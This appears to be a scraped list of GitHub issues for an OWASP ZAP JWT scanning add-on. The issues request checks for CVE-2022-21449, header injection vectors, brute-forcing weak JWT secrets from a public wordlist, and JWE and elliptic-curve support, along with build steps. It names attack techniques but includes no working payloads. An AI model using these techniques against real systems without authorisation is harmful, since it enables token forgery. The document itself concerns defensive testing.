sasanlabs / owasp-zap-jwt-addon Goto Github PK

Is your feature request related to a problem? Please describe.
It would be great if the JWT add-on could check for JWT issues related to CVE-2022-21449.

Describe the solution you'd like
Implement a scan rule/check that can detect something similar to:
https://twitter.com/christophetd/status/1516878071785467904

Sample Vulnerable Application of the JWT Null Signature Vulnerability (CVE-2022-21449)

Describe alternatives you've considered
N/A

Would you like to help fix this issue?
Not at this time.

Additional context
Nothing further.

https://github.com/SasanLabs/owasp-zap-jwt-addon/tree/master/src/main/java/org/zaproxy/zap/sharedutils -=> implementation("org.zaproxy.addon:commonlib:1.0.0")

Describe the bug
Currently this rule test on static files like (CSS, JS) which leads to false positive.

Expected behavior
Skip the test on static files

Would you like to help fix this issue?
Yes

To Reproduce
Steps to reproduce the behavior:

1. Create a request with an authorization header with a valid token - Authorization: Bearer xxxxxxx
2. Run an active scan
3. Notice how no requests are being sent out

Is your feature request related to a problem? Please describe.
The scan rules present at https://github.com/SasanLabs/owasp-zap-jwt-addon/tree/master/src/main/java/org/zaproxy/zap/extension/jwt/attacks are not having header param injections mentioned at https://portswigger.net/web-security/jwt. There are few other attacks which may not be present in AttackVectors.

Describe the solution you'd like
Add the Attack vectors for the left over injections as described at https://portswigger.net/web-security/jwt

Describe the bug
As the options panel for the JWT addon is complex, we should add the help index for the addon so that users can see the help index there only and they don't need to go to the readme.md in the repository to understand the options panel.

example of Help index:

Sample code changes
Help Index: https://github.com/SasanLabs/owasp-zap-fileupload-addon/tree/main/src/main/javahelp/org/sasanlabs/fileupload/resources/help

In https://github.com/SasanLabs/owasp-zap-jwt-addon/blob/master/src/main/java/org/zaproxy/zap/extension/jwt/ui/JWTOptionsPanel.java implement a method:

    @Override
    public String getHelpIndex() {
        return <name>;
    }

Sample PR: https://github.com/SasanLabs/owasp-zap-fileupload-addon/pull/6/files

Glimpse of UI where the help will be shown

Testing the changes
build the addon by running

1. ./gradlew spotlessApply
2. ./gradlew build
   Then go to the ZAP -> File -> Local addon file -> Navigate to project -> build -> bin -> jwt*.zap and done.

This addon should contain the ability to encode/decode JWT tokens found in the request, so that JWT tokens can be tested on fly

I'm new to ZAP and I'm having a problem understanding this plug-in.

Therefore, it would be nice if I knew the getting started tutorial instead of trying to understand the configuration.

I would love to create the tutorial if it could be included here.

Is your feature request related to a problem? Please describe.
Analyse the brute force attack with common passwords for jwt as per the following https://raw.githubusercontent.com/wallarm/jwt-secrets/master/jwt.secrets.list list.

Read more on https://lab.wallarm.com/meet-jwt-heartbreaker-a-burp-extension-that-finds-thousands-weak-secrets-automatically/

Is your feature request related to a problem? Please describe.
As JWT's should not be very long lived because of revocation issue hence an alert of low priority can be raised if such a case is found.
Need to analyse more on this and check if any other such validations are needed.

Is your feature request related to a problem? Please describe.
Currently i forget to checkin/update change log file and merge the PR and it is not right. so we can integrate an action which will not pass for a PR if changelog.md file is not modified.
https://github.com/marketplace/actions/changelog-checker is one github action i found and i think we can give it a try.
If this checker has some issues then we can write some common function to do the same as this is a generic problem and might be faced by many.

Related to: zaproxy/zaproxy#6049

https://github.com/SasanLabs/owasp-zap-jwt-addon/blob/master/src/main/java/org/zaproxy/zap/extension/jwt/JWTActiveScanner.java should be renamed JWTActiveScanRule or JwtActiveScanRule

Of course you don't have to conform to that since this is project is 3rd party, so close/address as you see fit. But it's a pretty simple change and helps bring consistency and clarity/specificity.

Is your feature request related to a problem? Please describe.
JWT option in fuzzer is not shown if request doesn't contains JWT pattern. There is no indication to the user that why JWT option is unavailable.

Glimpse of issues

If JWT pattern was found in the request then:

To Reproduce
Go to any request which is not having JWT pattern and then visit the fuzzer screen.

Expected behavior
Add the behavior details that the fuzzer will only show the JWT option if request has the valid jwt format in Readme.md and also help index (we are building this in PR: #25)

Is your feature request related to a problem? Please describe.
Currently, we only handle JWT signed using HMAC or RSA but we have not handled the JWT's signed by Elliptic Curve ES384 etc.

Describe the solution you'd like

1. Analyse the Vulnerabilities related to EC
2. Adding attack vectors related to that
3. Adding Custom payload support for EC based keys
4. Adding the Vulnerable code in https://github.com/SasanLabs/VulnerableApp/blob/master/src/main/java/org/sasanlabs/service/vulnerability/jwt/JWTVulnerability.java so that we can test the attack vectors.
5. Add a design document regarding the same.

JWT Configurations

Testing the changes, in case some implementation/poc is required
build the addon by running

1. ./gradlew spotlessApply
2. ./gradlew build
   Then go to the ZAP -> File -> Local addon file -> Navigate to project -> build -> bin -> jwt*.zap and done.

Is your feature request related to a problem? Please describe.
As the addon was made an year ago and there might be many new Vulnerabilities related to JWT are introduced. So we would like to analyse the new attack vectors and how can we incorporate those attack vectors in the addon.

Describe the solution you'd like
Look at the new blogs, bug bounties, other scan rules/add-ons/scanners to find out what we are missing and how can we incorporate them.

Code References
Attack vectors: https://github.com/SasanLabs/owasp-zap-jwt-addon/tree/master/src/main/java/org/zaproxy/zap/extension/jwt/attacks

JWT configuration
Go through readme for more information regarding the configuration.

Testing the changes, in case some implementation/poc is required
build the addon by running

1. ./gradlew spotlessApply
2. ./gradlew build
   Then go to the ZAP -> File -> Local addon file -> Navigate to project -> build -> bin -> jwt*.zap and done.

Is your feature request related to a problem? Please describe.
As Scanners cannot add all the types of payloads into its execution but in case the user wants custom payloads/additional payloads to be included as part of the scanner, we have custom payloads for such requirement.

This is specifically useful for the case, where say a key is stolen or only allowed for test environments but due to some bug they are used to sign the production JWT's, then this can help the organization to validate in pen-tests etc.

This was suggested by @kingthorin . for more information visit: #11 (comment)

Describe the solution you'd like
Add support for custom payloads where users can add the HMAC keys or other keys which are well known and check if their implementation is vulnerable to those payloads.

Code Reference
PR where custom payloads are added: https://github.com/pulls?q=is%3Apr+author%3Akingthorin+archived%3Afalse+custom+payloads+is%3Aclosed

Code where custom payloads/keys can be used in JWT addon: https://github.com/SasanLabs/owasp-zap-jwt-addon/blob/master/src/main/java/org/zaproxy/zap/extension/jwt/attacks/SignatureAttack.java#L96

We might need to enhance it in case we want to add the RSA-based keys.

Testing the changes

build the addon by running

1. ./gradlew spotlessApply
2. ./gradlew build
   Then go to the ZAP -> File -> Local addon file -> Navigate to project -> build -> bin -> jwt*.zap and done.

This issue is to track the inconsistency between truststore input and private key input.
Truststore takes input as pkcs12 format and private key input is PEM file.
Truststore input requires password where as private key input does.

in case users are facing trouble with this please add comment or thumbs up so that we can prioritise this issue.

thanks,
Karan

Is your feature request related to a problem? Please describe.

We have currently only handing JWS but we have not handled JWE so under this enhancement we are looking to add:

1. Analysing Vulnerabilities related to JWE by going through various blogs, bug bounties, other scanner add-on's
2. Implement the Attack vectors
3. Adding the Vulnerable code in https://github.com/SasanLabs/VulnerableApp/blob/master/src/main/java/org/sasanlabs/service/vulnerability/jwt/JWTVulnerability.java so that we can test the attack vectors.
4. Add a design document regarding the same.

Code References
Attack vectors: https://github.com/SasanLabs/owasp-zap-jwt-addon/tree/master/src/main/java/org/zaproxy/zap/extension/jwt/attacks
Adding Support for parsing JWE:

Testing the changes
build the addon by running

1. ./gradlew spotlessApply
2. ./gradlew build
   Then go to the ZAP -> File -> Local addon file -> Navigate to project -> build -> bin -> jwt*.zap and done.